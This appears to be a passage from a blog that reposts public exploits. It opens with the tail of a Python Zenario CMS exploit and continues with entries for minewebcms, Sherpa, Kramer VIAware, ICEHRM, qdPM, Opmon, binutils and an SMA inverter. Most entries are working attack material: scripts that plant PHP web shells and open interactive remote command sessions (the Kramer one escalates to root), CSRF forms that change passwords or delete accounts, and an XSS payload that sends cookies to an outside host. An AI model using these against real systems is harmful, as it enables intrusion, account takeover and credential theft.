OPe47TZH19KSB0TUeHcOIndE1LqNUqHUNj9BXN\n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\nCwDBAgAAvSsAAAAA\n" file_name = uuid.uuid4().hex file = open(file_name + ".docx", "wb") file.write(base64.decodebytes(file_content)) file.close() ### Upload docx file resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload", headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id":"", "fileUpload": 1, }, files={"Filedata": open(file_name + ".docx", "rb")}) ### Get sync id file resp_body = json.loads(resp.text) id_sync = resp_body["id"] # Update database resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'}) # If upload OK print("Upload file OK!") ## Change file extension ### Search ID file in Database resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID}) resp_body = json.loads(resp.text) file_id = resp_body["__item_sort_order__"]["0"] ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Change to .php resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'}) ## Get public URL webshell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "generate_public_link": 1}) response_body = resp.text web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36] # If web shell OK print("Web shell is available!") print("URL:", web_shell_url) print("Enter command.") ## Execute command cmd = '' while cmd != "exit": ### Get command cmd = input("> ") ### Get result resp = requests.post(web_shell_url, data={"cmd": cmd}) response_body = resp.text result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")] print(result) pass ## Delete web shell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "delete": 1}) print("Web shell is deleted!") # Delete docx file os.remove(file_name + ".docx") print("Docx file is deleted!")
  5. HireHackking

    minewebcms 1.15.2 - Cross-site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS) # Google Dork: NA # Date: 02/20/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://mineweb.org/ # Software Link: https://github.com/mineweb/minewebcms # Version: 1.15.2 # Tested on: KALI OS # CVE : CVE-2022-1163 # --------------- Steps to Reproduce:- => Install the WebApp and Setup it => Login in to webAPP using Admin Creds. => Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar" => Add/Edit a Link Select "Drop-Down Menu" => "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS => Payload : <script>alert(1);</script> => XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/
  6. HireHackking

    Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path # Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid) # Version: 2020.2.20328.2050 # Date: 02/04/2022 # Vendor Homepage: http://gimmal.com/ # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 # CVE: CVE-2022-23909 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto C:\>sc qc "Sherpa Connector Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Sherpa Connector Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sherpa Connector Service DEPENDENCIES : wmiApSrv SERVICE_START_NAME : LocalSystem
  7. HireHackking

    Kramer VIAware - Remote Code Execution (RCE) (Root)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Remote Code Execution as Root on KRAMER VIAware # Date: 31/03/2022 # Exploit Author: sharkmoos # Vendor Homepage: https://www.kramerav.com/ # Software Link: https://www.kramerav.com/us/product/viaware # Version: * # Tested on: ViaWare Go (Linux) # CVE : CVE-2021-35064, CVE-2021-36356 import sys, urllib3 from requests import get, post urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def writeFile(host): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } # write php web shell into the Apache web directory data = { "radioBtnVal":"""<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?>""", "associateFileName": "/var/www/html/test.php"} post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False) def getResult(host, cmd): # query the web shell, using rpm as sudo for root privileges file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False) pageText = file.text if len(pageText) < 1: result = "Command did not return a result" else: result = pageText return result def main(host): # upload malicious php writeFile(host) command = "" while command != "exit": # repeatedly query the webshell command = input("cmd:> ").strip() print(getResult(host, command)) exit() if __name__ == "__main__": if len(sys.argv) == 2: main(sys.argv[1]) else: print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")
  8. HireHackking

    ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion # Date: 29/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 # CVE: CVE-2022-26588 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: 1.) Now login into the application and go to users. 2.) After this add an user with the name Devansh. 3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request. 4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/ 5.) Now generate a csrf poc for post based requests with necessary parameters. 6.) Finally open that html poc and execute in the same browser session. 7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability. 4. Exploit POC (Exploit.html) <html> <form enctype="application/x-www-form-urlencoded" method="POST" action=" http://localhost:8070/app/service.php"> <table> <tr> <td>t</td> <td> <input type="text" value="User" name="t"> </td> </tr> <tr> <td>a</td> <td> <input type="text" value="delete" name="a"> </td> </tr> <tr> <td>id</td> <td> <input type="text" value="6" name="id"> </td> </tr> </table> <input type="submit" value="http://localhost:8070/app/service.php"> </form> </html>
  9. HireHackking

    qdPM 9.2 - Cross-site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF) # Google Dork: NA # Date: 03/27/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: KALI OS # CVE : CVE-2022-26180 # --------------- Steps to Exploit : 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it. 2) send it to victim. <html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title> <body> <script>history.pushState('', '', '/')</script> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"> <input type="hidden" name="sf&#95;method" value="put" /> <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly ---> <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" /> <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" /> <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" /> <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" /> <input type="hidden" name="users&#91;photo&#93;" value="" /> <input type="hidden" name="users&#91;culture&#93;" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  10. HireHackking

    Opmon 9.11 - Cross-site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Opmon 9.11 - Cross-site Scripting # Date: 2021-06-01 # Exploit Author: p3tryx # Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time # Version: 9.11 # Tested on: Chrome, IE and Firefox # CVE : CVE-2021-43009 # URL POC: <script> alert(document.cookie); var i=new Image; i.src="http://192.168.0.18:8888/?"+document.cookie; </script> Url-encoded Payload %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E ``` *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27};PAYLOAD&x=0&y=0 *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27}; %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E &x=0&y=0 ```
  11. HireHackking

    binutils 2.37 - Objdump Segmentation Fault

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: binutils 2.37 - Objdump Segmentation Fault # Date: 2021-11-03 # Exploit Author: p3tryx # Vendor Homepage: https://www.gnu.org/software/binutils/ # Version: binutils 2.37 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-43149 Payload file ``` %223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114 \00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111 111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111 $%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF \00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99\00 1))\FF)$\80 1114 \00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%2262211111111111111111111111111111111111111111111\00\00 \00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 111 $%22622FFF1111111111111111111FF\83))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99 1))\FF)$\80 1114 \00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111 1111111111111111111111111111111>11111111111d\00\00\00111111111111111111 111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1 1111 $%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111 111111111111@111111111111111111d\001111 \0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111 1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111 1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00 \0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111 111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1I11 $%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111 111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF \FF \00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11 $%22@22FF11111FFFFFFFFFFFFFF222$)$ ``` RUN the POC # binutils-2.37/binutils/objdump -T -D -x crash_2.37 ASAN:SIGSEGV ================================================================= ==27705==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38 T0) ==27705==Hint: pc points to the zero page. AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==27705==ABORTING
  12. HireHackking

    SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.sma.de # Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R # Tested on: Linux [Firefox] # CVE : CVE-2021-46416 # Proof of Concept ============[ Normal user request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1 ============[ Manipulated username request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 